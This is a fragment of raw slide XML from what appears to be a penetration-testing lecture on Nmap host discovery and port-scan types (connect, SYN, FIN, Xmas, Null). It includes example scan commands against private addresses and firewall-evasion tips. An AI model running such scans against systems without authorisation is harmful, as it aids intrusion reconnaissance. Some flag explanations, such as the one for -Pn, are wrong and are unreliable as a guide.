                        <a:t>Pn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="353535"/>
                        </a:solidFill>
                        <a:latin typeface="Verdana"/>
                        <a:hlinkClick r:id="rId2"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Treat all hosts as online -- skip host discovery	</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="579200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>-PS/PA/PU/PY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>portlist</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="353535"/>
                        </a:solidFill>
                        <a:latin typeface="Verdana"/>
                        <a:hlinkClick r:id="rId2"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>TCP SYN/ACK, UDP or SCTP discovery to given ports	</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="579200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>-PE/PP/PM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>	</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="353535"/>
                        </a:solidFill>
                        <a:latin typeface="Verdana"/>
                        <a:hlinkClick r:id="rId2"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>ICMP echo, timestamp, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>netmask</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t> request discovery probes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="353535"/>
                        </a:solidFill>
                        <a:latin typeface="Verdana"/>
                        <a:hlinkClick r:id="rId2"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
              <a:tr h="370891">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>-PO</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="0" i="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>[protocol list]	</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t>IP protocol</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="353535"/>
                          </a:solidFill>
                          <a:latin typeface="Verdana"/>
                        </a:rPr>
                        <a:t> ping</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="353535"/>
                        </a:solidFill>
                        <a:latin typeface="Verdana"/>
                        <a:hlinkClick r:id="rId2"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45726" marB="45726"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3509363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Screen shot 2015-02-18 at 8.49.4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5" y="0"/>
            <a:ext cx="8651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365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3" descr="Screen shot 2015-02-18 at 9.33.2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33475"/>
            <a:ext cx="86741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131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Screen shot 2015-02-18 at 9.36.0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196975"/>
            <a:ext cx="903605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097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descr="Screen shot 2015-02-18 at 9.32.1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76275"/>
            <a:ext cx="914400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80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TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>onnection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a:t>The connect() system call provided by an OS is used to open a connection to every interesting port on the machine. If the port is listening, connect() will succeed, otherwise the port isn’t reachable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PRO: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No special privileges are required to run the TCP connect() scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CON: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The disadvantage of this scan is apparent when application connection logs are examined.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="770451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closed port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39938" name="Picture 4" descr="Screen shot 2015-02-18 at 10.12.22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1658938"/>
            <a:ext cx="9075737"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039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open port</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40962" name="Picture 3" descr="Screen shot 2015-02-18 at 10.12.4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9263"/>
            <a:ext cx="9148763"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78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TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>onnection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Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –p –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 10.0.0.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– This invokes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from the Linux terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Switch that performing a TCP Connection Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-p – Switch that scanning 65,535 port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Switch that performing Ping before scanning each port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>10.0.0.2 – Host whose ports we are scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20342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381000"/>
            <a:ext cx="8229600" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="DDDDDD"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>What is Penetration Testing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="1447800"/>
            <a:ext cx="7848600" cy="4343400"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:lumMod val="50000"/>
              <a:alpha val="49001"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>A penetration test is a method of evaluating the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> of a computer system or network by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>simulating an attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> from a malicious source. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The process involves an active analysis of the system for any potential vulnerabilities that may result from poor or improper system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>, known and/or unknown hardware or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>software flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>operational weaknesses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> in process or technical countermeasures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>The intent of a penetration test is to determine feasibility of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> and the amount of business </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t> of a successful exploit, if discovered. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1154113" y="5908675"/>
            <a:ext cx="6905625" cy="4619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00EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>(Source: http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>en.wikipedia.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>/wiki/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Penetration_test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000EC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="8001000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800" cmpd="dbl">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02156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Screen shot 2015-02-18 at 9.07.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415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SYN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a:t>SYN scan is the default and most popular scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>option</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>half-open scanning, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>not open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a full TCP connection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PRO: Very fast, most common scan used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CON: Funky stuff happens when a firewall, packet filter, or packet shaper is in between you and the target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3275026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18 at 3.14.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1" y="1210424"/>
            <a:ext cx="9144001" cy="3474405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="702411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FIN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PRO: FIN Scans can sneak around non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> firewalls and packet filters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CON: Because of the way the scan is conducted, ports respond as either closed, or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>open|filtered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Many major OS’ sent a RST regardless of open or closed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NOTE: Variations of this are NULL and Xmas Scans</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2785937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Screen shot 2015-02-18 at 9.54.3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 y="692150"/>
            <a:ext cx="9051925" cy="606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722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Xmas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Used to scan a range of host IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –p22,80 192.168.94.0-255</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4185220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Screen shot 2015-02-18 at 9.25.3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0"/>
            <a:ext cx="8667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100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 Xmas Tree, and Null Scan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1412875"/>
            <a:ext cx="9144000" cy="5445125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Null scan (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not set any bits (TCP flag header is 0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FIN scan (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sets just the TCP FIN bit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Xmas scan (-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sX</a:t>
            </a:r>
            <a:r>
